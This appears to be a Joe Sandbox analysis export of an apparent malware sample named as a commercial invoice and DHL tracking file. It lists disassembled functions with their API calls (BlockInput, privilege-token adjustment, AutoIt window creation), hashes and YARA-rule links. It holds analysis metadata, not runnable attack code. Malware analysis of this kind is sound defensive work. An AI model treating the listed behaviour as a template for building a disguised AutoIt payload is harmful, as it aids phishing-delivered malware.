Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: a3f4e25b6cff822c2018d42503ca35e20d0161a55d362c1c72afbd0d22a16eef
Instruction ID: 36680a2f8fbc7064708e9eb61d2762ab0639a2d8bc41b053545934f4eabf6867
Opcode Fuzzy Hash: a3f4e25b6cff822c2018d42503ca35e20d0161a55d362c1c72afbd0d22a16eef
Instruction Fuzzy Hash: 14E0BF72018610AEE7252B51FC45EB777A9EB04314F14883FF5A6804B1DB666CE1DB58

Function 0043676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436766,?,?,00000008,?,?,0043FEFE,00000000), ref: 00436998

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
Instruction ID: d30b49202280407283aebb84bb8e606652760a62ec8e3b3cb6f6b3a781ee24c8
Opcode Fuzzy Hash: 198a520ea869a35980b3f78eccd319767a6126f68f47798b27a54d549f42ff15
Instruction Fuzzy Hash: 75B15D7151060AAFD719CF28C48AB657BE0FF09364F26D659E899CF3A1C339D982CB44

Function 0041B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 0045851F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fc9b716e5d7671c1241b7c4712162e63b804e2f0a4251a4178bb985621070140
Instruction ID: 9c96022233e00f45b40e0282f1d885220868f9e058b094fd9f7a4bbb96fcb14f
Opcode Fuzzy Hash: fc9b716e5d7671c1241b7c4712162e63b804e2f0a4251a4178bb985621070140
Instruction Fuzzy Hash: 611252719002299FDB14CF59C8806EEB7B5FF48710F14819BE849EB252EB389E85CF95

Function 0047EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0047EABD

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 15020fdac601a566885ed4c0a870f6d579dd1160b3a1fd7142283fffb891c640
Instruction ID: b40af947e9697942177ffb577b1694246c813bd138668231549b55f752874d47
Opcode Fuzzy Hash: 15020fdac601a566885ed4c0a870f6d579dd1160b3a1fd7142283fffb891c640
Instruction Fuzzy Hash: 42E01A31200204AFC710EF6AD844E9AB7E9AF98764F00846BFC49D7391DA78AC418B99

Function 004209D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,004203EE), ref: 004209DA

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 34453acfcdf46af830c81bc421b5064df1454124b76db59955965f425ba95087
Instruction ID: f705d55398cb153b68197336f49732564042bcd18df78a8ece02566bb4e07c66
Opcode Fuzzy Hash: 34453acfcdf46af830c81bc421b5064df1454124b76db59955965f425ba95087
Instruction Fuzzy Hash:

Function 0042781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0042798B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: dd5f3ba559151bc3021faa4d08a574aa33d8e02e948c2b5efb3109fbb398670e
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: FB5168B170C7355AEB386629749A7BF27859B02344FD8090FD882C7382C60DDE82D75E

Function 00472046 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

0&M, xrefs: 00472053

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID: 0&M
API String ID: 0-278495883
Opcode ID: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
Instruction ID: cef1c09b466cac432e6cc030d138e4a232e0cfdd24342920920addecda63d74c
Opcode Fuzzy Hash: c32e3fc8385f568c32938d2280db9929dc4b1fa9f2a4dd4730763afb1ea23267
Instruction Fuzzy Hash: 5321D8323216118BDB28CF79C9226BE73E5A764310F188A2FE4A7C33D0DE79A904C754

Function 00436DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad0e8307ef338da49e0da29b8b170f2fc18eeef58ad5343f8096971db0679d2e
Instruction ID: 3ce898e0723c675ca30dfd83868675bb9146081620d05d072c43bf9694a9d0bf
Opcode Fuzzy Hash: ad0e8307ef338da49e0da29b8b170f2fc18eeef58ad5343f8096971db0679d2e
Instruction Fuzzy Hash: 99325661D29F014DD7239638CD22336A649AFBB3D5F15E337E81AB5EA6EB28C4C35104

Function 0041CC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e3b1f49e82936be172b0303e30b5fac16f65e483f72630dc639334d00fedcf3
Instruction ID: 567821adab74a7b52272253c1dccd6f41d6d8a7a8cd2a5a9328308b85443cdc3
Opcode Fuzzy Hash: 7e3b1f49e82936be172b0303e30b5fac16f65e483f72630dc639334d00fedcf3
Instruction Fuzzy Hash: 5B32E631A003158FDF24CE69C8D46BE7BA1EB45306F288567DC4597393E23C9D8ADA8D

Function 00407920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bcc3d9166a0242764d4bc1e70deacf1a206030cd09490a2fad302018f0b9b9c
Instruction ID: 16488a37a9ebf6b43e4c6892e0fc228140128a1d93a8fd0dca1333f1a8601933
Opcode Fuzzy Hash: 5bcc3d9166a0242764d4bc1e70deacf1a206030cd09490a2fad302018f0b9b9c
Instruction Fuzzy Hash: 3C22D170E006099FEF14CF65D841AAEB3F1FF44304F14453AE816A7292EB39AD55CB59

Function 004091C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162d60c108e19d52b5546031e15313829679ff4244cc0ed0e5eba159f4329a50
Instruction ID: a7c37e6f1452ed374a139f2922219f308528d16e40839c2f88b42618a8a79e06
Opcode Fuzzy Hash: 162d60c108e19d52b5546031e15313829679ff4244cc0ed0e5eba159f4329a50
Instruction Fuzzy Hash: 9C02CAB0E00205EFDB04DF55D881AAEB7B1FF44304F11856AE806AB391EB39ED55CB99

Function 004219B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 263be3c91c1eb535f95e0da61d69067ed54d374e2ef309587b9275242729dd05
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: B89194723090F30ADB29467AA57403FFFF15AA23A135A07AFD4F2CA2E1FD189554D624

Function 00427A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cfc99caef6fcf3a1232713fd42500ccdf6fc43273da94df47a7739a65c3388a
Instruction ID: 84ac85275a216eff532c1add87baca4d75615409e8ba58ee8a571bdc319d84d4
Opcode Fuzzy Hash: 2cfc99caef6fcf3a1232713fd42500ccdf6fc43273da94df47a7739a65c3388a
Instruction Fuzzy Hash: C761467130873596DA349929B895BBF3794DF41318FD0091FE842DB382DA1DAE42871E

Function 00421706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 76ceb53c6dfe0c4248e762e257b909a8a314b5929079aaa7e546bb38e22f71ec
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 548174727080B309DB2D423A957443FFFE15AE23A135A079FD4F2CB2E1EE288554E624

Function 019A3640 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 006c8081c181ac556f1a3c92b2aca6193dbe47c0ae63bec452bc5a4e227960d5
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8A41D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80

Function 019A3530 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 5f2b69c4ca0c07659c30bd558e44720f882da4edb0dd530b4aa9734253af1875
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 1A018078A04109EFCB44DF98C5909AEF7B5FB48310B608699D809A7701D730AE41DB80

Function 019A34D0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 1e82e51fa2cffabc05baf737206902140f81da6608289866a5e4c42ce7819e4a
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 53018078A04209EFCB48DF98C5909AEF7B5FB48210B608599D909A7701D730AE41DB80

Function 019A1E70 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1437848830.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_19a0000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00482ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00482B30
DeleteObject.GDI32(00000000), ref: 00482B43
DestroyWindow.USER32 ref: 00482B52
GetDesktopWindow.USER32 ref: 00482B6D
GetWindowRect.USER32(00000000), ref: 00482B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00482CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00482CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482CF8
GetClientRect.USER32(00000000,?), ref: 00482D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00482D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482D80
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482D98
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482DA8
GlobalFree.KERNEL32(00000000), ref: 00482DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,0049FC38,00000000), ref: 00482DDB
GlobalFree.KERNEL32(00000000), ref: 00482DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00482E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00482E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00482E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0048303F

Strings

, xrefs: 00482FC5
static, xrefs: 00482D3A, 00482E91
AutoIt v3, xrefs: 00482CF2
DISPLAY, xrefs: 00482EA2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: b494cc3624a38074f3221385d133c055cd0034efb3e5cf8de8c6dcb354adba42
Instruction ID: bbf4dd1d0e10ac38dbf2890fd7e20bdbd7a257b4c3ab9d414e1cffb64e0bd8dd
Opcode Fuzzy Hash: b494cc3624a38074f3221385d133c055cd0034efb3e5cf8de8c6dcb354adba42
Instruction Fuzzy Hash: E7028D71900205EFDB14DFA4CD89EAE7BB9EF49314F00856AF915AB2A1C774AD01CF68

Function 004970D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0049712F
GetSysColorBrush.USER32(0000000F), ref: 00497160
GetSysColor.USER32(0000000F), ref: 0049716C
SetBkColor.GDI32(?,000000FF), ref: 00497186
SelectObject.GDI32(?,?), ref: 00497195
InflateRect.USER32(?,000000FF,000000FF), ref: 004971C0
GetSysColor.USER32(00000010), ref: 004971C8
CreateSolidBrush.GDI32(00000000), ref: 004971CF
FrameRect.USER32(?,?,00000000), ref: 004971DE
DeleteObject.GDI32(00000000), ref: 004971E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00497230
FillRect.USER32(?,?,?), ref: 00497262
GetWindowLongW.USER32(?,000000F0), ref: 00497284

Part of subcall function 004973E8: GetSysColor.USER32(00000012), ref: 00497421
Part of subcall function 004973E8: SetTextColor.GDI32(?,?), ref: 00497425
Part of subcall function 004973E8: GetSysColorBrush.USER32(0000000F), ref: 0049743B
Part of subcall function 004973E8: GetSysColor.USER32(0000000F), ref: 00497446
Part of subcall function 004973E8: GetSysColor.USER32(00000011), ref: 00497463
Part of subcall function 004973E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00497471
Part of subcall function 004973E8: SelectObject.GDI32(?,00000000), ref: 00497482
Part of subcall function 004973E8: SetBkColor.GDI32(?,00000000), ref: 0049748B
Part of subcall function 004973E8: SelectObject.GDI32(?,?), ref: 00497498
Part of subcall function 004973E8: InflateRect.USER32(?,000000FF,000000FF), ref: 004974B7
Part of subcall function 004973E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004974CE
Part of subcall function 004973E8: GetWindowLongW.USER32(00000000,000000F0), ref: 004974DB

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 1d8408493b8f9eca714ed5f7439df046efebe5dd77da0c9f66854e1289a10aec
Instruction ID: 7653aa0511b1474f4b3cda614fda4756ac704073239f7f11a827eee26e1b1a20
Opcode Fuzzy Hash: 1d8408493b8f9eca714ed5f7439df046efebe5dd77da0c9f66854e1289a10aec
Instruction Fuzzy Hash: AFA1B172018311BFDB109F60DC89E5B7BA9FF99320F100A3AF962961E1D734E945CB5A

